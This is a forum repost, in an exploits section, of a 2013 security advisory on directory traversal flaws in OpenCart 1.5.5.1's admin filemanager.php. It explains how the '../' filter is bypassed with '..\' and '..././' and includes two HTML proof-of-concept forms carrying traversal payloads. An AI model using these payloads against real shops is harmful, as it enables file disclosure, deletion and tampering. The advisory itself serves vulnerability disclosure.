Jump to content
Gonzalez

OpenCart 1.5.5.1 (filemanager.php) - Directory Traversal Arbitrary File Access

By Gonzalez, in Exploituri

Recommended Posts

Gonzalez Newbie

Gonzalez

Posted
Posted 
[waraxe-2013-SA#098] - Directory Traversal Vulnerabilities in OpenCart 1.5.5.1
===============================================================================

Author: Janek Vind "waraxe"
Date: 19. March 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-98.html


Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

OpenCart is a turn-key ready "out of the box" shopping cart solution.
You simply install, select your template, add products and your ready to start
accepting orders.

http://www.opencart.com/

Affected are all OpenCart versions, from 1.4.7 to 1.5.5.1, maybe older too.

###############################################################################
1. Directory Traversal Vulnerabilities in "filemanager.php"
###############################################################################

Reason: insufficient sanitization of user-supplied data
Attack vectors:
 1. user-supplied POST parameters "directory", "name", "path", "from", "to"
Preconditions:
 1. Logged in as admin with filemanager access privileges

Script "filemanager.php" offers for OpenCart admins various file related services:
directory listing and creation, image file listing, file copy/move/unlink, upload,
image resize. By the design OpenCart admin can manage files and directories only
inside specific subdirectory "image/data/". It means, that even if you have
OpenCart admin privileges, you still are not suppose to get access to the files
and directories below "image/data/". So far, so good.
But what about directory traversal? Let's have a look at the source code.

PHP script "admin/controller/common/filemanager.php" line 66:
------------------------[ source code start ]----------------------------------
public function directory() {   
    $json = array();

    if (isset($this->request->post['directory'])) {
        $directories = glob(rtrim(DIR_IMAGE . 'data/' .
           str_replace('../', '', $this->request->post['directory']), '/') .
           '/*', GLOB_ONLYDIR);

        if ($directories) {
            $i = 0;

            foreach ($directories as $directory) {
                $json[$i]['data'] = basename($directory);
                $json[$i]['attributes']['directory'] =
                   utf8_substr($directory, strlen(DIR_IMAGE . 'data/'));
...

    $this->response->setOutput(json_encode($json));
------------------------[ source code end ]------------------------------------

We can see, that directory traversal is prevented by removing "../" substrings
from user submitted parameters. At first look this seems to be secure enough -
if we can't use "../", then directory traversal is impossible, right?
Deeper analysis shows couple of shortcomings in specific filtering method.
First problem - if OpenCart is hosted on Windows platform, then it's possible
to use "..\" substring for directory traversal.

Test (parameter "token" must be valid):
-------------------------[ test code start ]-----------------------------------
<html><body><center>
<form action="http://localhost/oc1551/admin/index.php?route=common/filemanager/directory&token=92aa6ac32b4c8e7a175c3dc9f7754d25" method="post">
<input type="hidden" name="directory" value="..\..\..\">
<input type="submit" value="Test">
</form>
</center></body></html>
--------------------------[ test code end ]------------------------------------

Server response is in JSON format and contains listing of subdirectories outside
of OpenCart main directory.

Second problem - filtering with "str_replace" can be tricked by using custom
strings. If we use "..././" substring, then after filtering in becomes "../".
So it appears, that implemented anti-traversal code is ineffective and can
be bypassed.

Test (parameter "token" must be valid):
-------------------------[ test code start ]-----------------------------------
<html><body><center>
<form action="http://localhost/oc1551/admin/index.php?route=common/filemanager/directory&token=92aa6ac32b4c8e7a175c3dc9f7754d25" method="post">
<input type="hidden" name="directory" value="..././..././..././..././">
<input type="submit" value="Test">
</form>
</center></body></html>
--------------------------[ test code end ]------------------------------------

Server response is exactly same as in previous test - information about directory
structure outside of OpenCart main directory has been disclosed.

PHP script "filemanager.php" contains 14 uses of "str_replace('../', ''," code.
Most of the public functions in "filemanager.php" are affected by directory
traversal vulnerability:

public function directory() -> listing of subdirectories
public function files() -> listing of image files
public function create() -> creation of new directories
public function delete() -> deletion of arbitrary files and directories
public function move() -> renaming of files or directories
public function copy() -> copying of files or directories
public function rename() -> renaming of files or directories
public function upload() -> uploading of image or flash files



Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

Waraxe forum:  http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
Random project: http://albumnow.com/
---------------------------------- [ EOF ] ------------------------------------

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...